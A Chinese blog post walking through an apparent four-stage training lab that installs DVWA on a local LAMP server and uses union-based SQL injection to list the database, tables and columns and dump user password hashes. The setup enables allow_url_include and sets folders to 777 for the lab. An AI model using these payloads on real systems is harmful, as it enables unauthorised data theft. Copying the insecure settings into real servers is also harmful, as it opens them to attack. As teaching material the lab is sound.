数据库SQL注入漏洞

最新推荐文章于 2024-05-13 04:35:06 发布
最新推荐文章于 2024-05-13 04:35:06 发布
阅读量1k 收藏 5
点赞数 3
文章标签: 安全 网络安全 linux 数据库 sql
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/m0_64587776/article/details/127373957
版权

第1关:获取dvwa环境

问题描述

搭建dvwa环境,包括1、搭建LAMP服务;2、部署dvwa服务;3、访问dvwa主页。

相关知识   

  •    安装appach  

首先更新源

apt update

安装apache2

apt install apache2 -y

启动apache2

service apache2 start

浏览器访问127.0.0.1,查看apache2是否正常运行

 

  • 安装php

更新源,安装php

apt install php -y

安装常用模块

apt install php-pear php-fpm php-dev php-zip php-curl php-xmlrpc php-gd php-mysql php-mbstring php-xml libapache2-mod-php

查看php版本

php -v

 

重启apache2

service apache2 restart 

修改apache配置文件

  1. $ sudo vim /etc/php/7.0/apache2/php.ini
  2. #allow_url_include = Off
  3. allow_url_include = On # 设置为On

 

  •  安装mysql

安装mysql

apt install mysql-server -y

启动mysql服务

service mysql start

测试数据库是否安装成功,使用root登录数据库。由于是root权限不需要密码

mysql -u root

查看数据库 

show databases;

退出数据库 

exit; 

mysql安全配置初始化

mysql_secure_installation

Y为root用户添加密码插件

 

方便实验选择密码强度0

 

输入密码dvwa123456

 

移除匿名用户

 

禁止root远程登录

 

移除test数据库

 

刷新权限表

 登录mysql

mysql -u root -p

为dvwa创建数据库

create database dvwa;

 

  •  安装dvwa

切换到/var/www/html目录

cd /var/www/html

下载dvwa

git clone GitHub - digininja/DVWA: Damn Vulnerable Web Application (DVWA)

修改配置文件

  1. $ cd /var/www/html/DVWA/config
  2. $ cp config.inc.php.dist config.inc.php
  3. $ vim config.inc.php
  4. ...
  5. $_DVWA[ 'db_user' ] = 'root';
  6. $_DVWA[ 'db_password' ] = 'dvwa123456';
  7. $_DVWA[ 'recaptcha_public_key' ] = '6LdJJlUUAAAAAH1Q6cTpZRQ2Ah8VpyzhnffD0mBb';
  8. $_DVWA[ 'recaptcha_private_key' ] = '6LdJJlUUAAAAAM2a3HrgzLczqdYp4g05EqDs-W4K';

 

给文件夹赋予权限

sudo chmod 777 -R /var/www/html/DVWA/hackable/uploads/

sudo chmod 777 /var/www/html/DVWA/external/phpids/0.6/lib/IDS/tmp/phpids_log.txt

sudo chmod 777 -R /var/www/html/DVWA/config

 访问127.0.0.1/DVWA/setup.php,点击Create/Reset Database

成功之后会自动跳转到登录界面用户名为admin,密码为password

 

第2关:获取数据库名称、账户名、版本及操作系统信息

问题描述

在上一章的基础上判断是否存在SQL注入漏洞。

相关知识   

1.SQL注入分类

SQL 注入的分类,基于从服务器接收到的响应,可以划分为:

  • 联合查询注入
  • 基于错误的 SQL 注入
  • 堆查询注入
  • 基于布尔 SQL 盲注
  • 基于时间的 SQL 盲注
  • 基于报错的 SQL 盲注

2.注入中常用的系统函数

列举 mysql 中几个常用函数(这些函数常用与 SQL 注入点的判断)。

  • version()——MySQL 版本
  • user()——数据库用户名
  • database()——数据库名
  • @@datadir——数据库路径
  • @@version_compile_os——操作系统版本

3.字符串连接函数

字符串连接函数在构造 SQL 注入中也常使用:

  • concat(str1,str2,...)——没有分隔符地连接字符串;
  • concat_ws(separator,str1,str2,...)——含有分隔符地连接字符串;
  • group_concat(str1,str2,...)——连接一个组的所有字符串,并以逗号分隔每一条数据。

4.逻辑运算

逻辑运算符在 SQL 注入中发挥着十分重要的作用如:||、&&、& 等,其本身含义很容易理解,这里不做过多介绍,等到后面涉及到真正的实操时再做进一步解释。

  • sql实践

在第一关的基础上,登录dvwa平台,用户名为"admin",密码为"password",

并访问127.0.0.1/DVWA/security.php,设置安全等级为low,然后Submit提交。

 

点击SQL Injection,并在id处输入1。可以看到

 

输入1',可以看到报错。可能存在sql注入

 

使用肯定为真的语句测试1' or '1' = '1。输出了所有用户信息,判断肯定存在sql注入

 

判断sql注入返回的列数,下面order by x表示输出按照第x列排序,#表示注释后面的sql语句。当x=3时报错,说明sql语句只返回两列信息。

  • 1' order by 1 #
  • 1' order by 2 #
  • 1' order by 3 #

使用联合查询方法查询MySQL 版本和操作系统版本

1' union select version(),@@version_compile_os#

 测试说明

使用sql注入查询数据库用户名和数据库名,

1' union select user(),database()#

 

并将用户名和数据库名写入/data/workspace/myshixun/result2中

 写入result2中的内容为:  root@localhost dvwa

 

第3关:获取数据库表名、列名

问题描述

在上一章的基础上获取数据库表名、列名。

相关知识   

  • SQL注入实践

每一个mysql都存在一个系统库information_schema,里面有mysql的“骨架”即所有的数据库,数据表,相应的字段名。得到一个dvwa数据库与第二关database()获的的数据库名称相同

1' UNION SELECT 1,database() from information_schema.schemata#

利用下面语句可以查询information_schema下所有表的名字

1' UNION SELECT 1,table_name from information_schema.tables where table_schema='information_schema'#

测试说明

使用sql注入查询dvwa数据库的所有表名,

1' UNION SELECT 1,table_name from information_schema.tables where table_schema='dvwa'#

  

并将所有表明写入/data/workspace/myshixun/result3中

 写入result3中的内容为:  guestbook users

第4关:获取用户名密码,并猜测root用户

问题描述

在上一章的基础上获取用户名密码并猜测root用户。

相关知识   

  • SQL注入实践

通过上一关的实践,我们已经得到了数据库dvwa的表名guestbook和users。 可以使用联合查询的方法查询对应表的所有列名分别为comment_id、comment、name

1' UNION SELECT 1,column_name from information_schema.columns where table_schema='dvwa' and table_name='guestbook'#

 

 可以使用联合查询获取获得数据,因为列的数量大于2,所以需要使用group_concat将所有数据合并,并使用0x3a分割。

1' UNION SELECT 1,group_concat(comment_id,0x3a,comment,0x3a,name) from guestbook#

测试说明

  • 使用sql注入查询users表中管理员的密码,

查询users表中的字段名称

1' UNION SELECT 1,column_name from information_schema.columns where table_schema='dvwa' and table_name='users'#

 

查询users表中管理员的密码

1' UNION SELECT 1,group_concat(user,0x3a,password,0x3a) from users#

  

并将解密密码/data/workspace/myshixun/result4中

例如查询到的密码为0d107d09f5bbe40cade3de5c71e9e9b7,需要使用在线网站解密后写入"letmein"

由上述例子可知,为md5解密方式,解密后的结果为: password 

 

开始你的任务吧,祝你成功! 

是努力站桩的奶酪呀~
关注
  • 3
    点赞
  • 5
    收藏
    觉得还不错? 一键收藏
  • 1
    评论
SQL注入漏洞
qq_43279943的博客
03-31 401
SQL注入漏洞漏洞原理注入类型漏洞检测单引号测试 漏洞原理 SQL注入是由于编辑代码的人员对用户提交参数没有进行一定的审核或者过滤机制不严格,导致用户可以对SQL语句进行重新构造,执行不在预期内的数据库命令,造成数据信息泄露的漏洞注入类型 SQL注入按照注入点参数分类通常分为字符型和数字型 字符型:select * from users where id = '1'; 数字型:select *...
注入漏洞一把嗦(原理+步骤+防御)
Y22Lee的博客
03-21 1269
以csdn为例,除去请求头信息,剩下的都是Head信息,其中U-A是用户的基本信息,Referer是用户的请求来源。没有回显的注入SQL注入中最繁琐;因为没有明确的回显,所以不能直观的得到数据。只能尝试测出数据。一般盲注分为布尔盲注和时间盲注。宽字节是指占俩个以上字节的字符,而一般的字符只占一个字节,被称作单字节(窄字节)。ASCII:单字节编码GBK,UTF-8:单字节/双字节编码(区别根据范围划分,范围与ASCII保持一致)英文通常是默认占用一个字节,而汉字占用俩个字节!
Web安全——SQL注入漏洞_简述web注入漏洞获取数据库中数据的主要流程
2401_84968882的博客
05-13 951
自我介绍一下,小编13年上海交大毕业,曾经在小公司待过,也去过华为、OPPO等大厂,18年进入阿里一直到现在。深知大多数网络安全工程师,想要提升技能,往往是自己摸索成长,但自己不成体系的自学效果低效又漫长,而且极易碰到天花板技术停滞不前!因此收集整理了一份《2024年网络安全全套学习资料》,初衷也很简单,就是希望能够帮助到想自学提升又不知道该从何学起的朋友。既有适合小白学习的零基础资料,也有适合3年以上经验的小伙伴深入学习提升的进阶课程,基本涵盖了95%以上网络安全知识点!真正的体系化!
常见安全漏洞及其解决方案
A_991128a的博客
06-17 6247
执行时,此后的文本将被忽略。但这并不是无代价的,受到损失最大的就是被控制的网站,往往随着暗链所指向的网站的权重不断提高,存在暗链的网站的权重将不断下降,搜索引擎排名也必然一再下降,严重影响网站的影响力。漏洞危害:该漏洞是通过版本号探测的,可能存在误报Apache HTTP Server是一款开源的流行的HTTPD服务程序.当处理包含大量Ranges头的HTTP请求时,ByteRange过滤器存在一个错误,攻击者可以向服务器发送特制HTTP请求,消耗大量内存,造成应用程序崩溃CVE-2011-3192。
SQL 注入漏洞详解
m0_60571990的博客
12-19 3725
SQL 注入漏洞详解
web漏洞-SQL注入漏洞、目录遍历漏洞、文件下载漏洞
ran的博客
01-10 1251
在owasp发布的top10排行榜里,注入漏洞一直是危害排名第一的漏洞,其中注入漏洞里面首当其冲的就是数据库注入漏洞。一个严重的SQL注入漏洞,可能会直接导致一家公司破产!SQL注入漏洞主要形成的原因是在数据交互中,前端的数据传入到后台处理时,没有做严格的判断,导致其传入的“数据”拼接到SQL语句中后,被当作SQL语句的一部分执行。从而导致数据库受损(被脱裤、被删除、甚至整个服务器权限沦陷)。
DB2数据库SQL注入手册1
08-08
DB2数据库SQL注入手册 DB2数据库SQL注入手册是指在使用DB2数据库时,如何检测和防止SQL注入攻击的一份指南。SQL注入是一种常见的Web应用程序安全漏洞,攻击者可以通过在输入字段中 inject恶意SQL代码来访问或控制...
SQL注入漏洞全接触.ppt
11-15
* 根据不同的数据库管理系统, SQL注入漏洞可以分为Access注入SQL Server注入、MySQL注入等。 * 不同的数据库管理系统有不同的函数、注入方法,所以在注入之前,我们还要判断一下数据库的类型。 四、 SQL注入漏洞...
SQL注入漏洞演示源代码
09-29
SQL注入漏洞网络安全领域中的一个重要话题,它涉及到数据库管理和Web应用程序的安全性。在这个"SQL注入漏洞演示源代码"中,我们可以深入理解这种攻击方式的工作原理,并学习如何防止它。 SQL注入是通过输入恶意的...
asp终极防范SQL注入漏洞
01-02
下面给出4个函数,足够你抵挡一切SQL注入漏洞!读懂代码,你就能融会贯通。 注意要对所有的request对象进行过滤:包括 request.cookie, request.ServerVariables 等等容易被忽视的对象: 代码如下: function killn...
SQL注入漏洞发现和数据库监控系统.zip
最新发布
05-27
SQL注入漏洞网络安全领域中的一个重要话题,它主要发生在应用程序与数据库交互时,由于不恰当的输入验证导致恶意用户能够执行自定义SQL命令。本篇将深入探讨SQL注入漏洞的发现、修补技术和数据库监控系统的应用。 ...
SQL注入漏洞的检测及防御方法
Python_0011的博客
12-26 110
内容概要:包括 内网、操作系统、协议、渗透测试、安服、漏洞注入、XSS、CSRF、SSRF、文件上传、文件下载、文件包含、XXE、逻辑漏洞、工具、SQLmap、NMAP、BP、MSF…技术文档也是我自己整理的,包括我参加大型网安行动、CTF和挖SRC漏洞的经验和技术要点,电子书也有200多本,由于内容的敏感性,我就不一一展示了。网上虽然也有很多的学习资源,但基本上都残缺不全的,这是我自己录的网安视频教程,上面路线图的每一个知识点,我都有配套的视频讲解。错误信息处理:避免将详细的数据库错误信息暴露给用户。
薄纱全网 史上最全SQL注入漏洞总结
MachineGunJoe666
07-07 1072
注入漏洞在十大Web安全漏洞之中,其主要原因是对用户的输入过滤不严,导致程序以危险的方式运行,注入漏洞应用最广泛,杀伤力也很大如最常见的sql注入,命令注入,还有代码注入、xss等。最常见的Web漏洞之一,作用对象在数据库中,程序没有对用户输入数据的合法性进行验证和过滤,导致sql查询语句被恶意拼接,sql注入漏洞存在的条件:参数用户可控、参数可以动态拼接sql语句并带入数据库查询、参数过滤不严。
安全攻防六:SQL注入,明明设置了强密码,为什么还会被别人登录
运维大湿兄的博客
04-11 1329
在正文之前,让我们先来看一个案例。某天,当你在查看应用的管理后台时,发现有很多异常的操作。接着,你很快反应过来了,这应该是黑客成功登录了管理员账户。于是,你立刻找到管理员,责问他是不是设置了弱密码。管理员很无辜地表示,自己的密码非常复杂,不可能泄漏,但是为了安全起见,他还是立即修改了当前的密码。奇怪的是,第二天,黑客还是能够继续登录管理员账号。问题来了,黑客究竟是怎么做到的呢?你觉得这里面的问题究...
sql注入漏洞详解
qq_39511050的博客
09-17 1025
sql注入漏洞详解
SQL注入漏洞详解总结大全
m0_64583632的博客
01-20 3423
SQL注入利用手法详解大全
头歌-信息安全技术-实训04 数据库SQL注入漏洞
不服输的小乌龟
10-17 5484
搭建dvwa环境,包括1、搭建LAMP服务;2、部署dvwa服务;3、访问dvwa主页。
SQL注入漏洞详解与防范
"SQL注入漏洞全接触" SQL注入是一种常见的网络安全问题,主要发生在基于Web的应用程序中,当应用程序没有正确地过滤或验证用户输入的数据时,攻击者可以通过输入恶意的SQL代码来操纵数据库。这种漏洞允许攻击者绕过...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值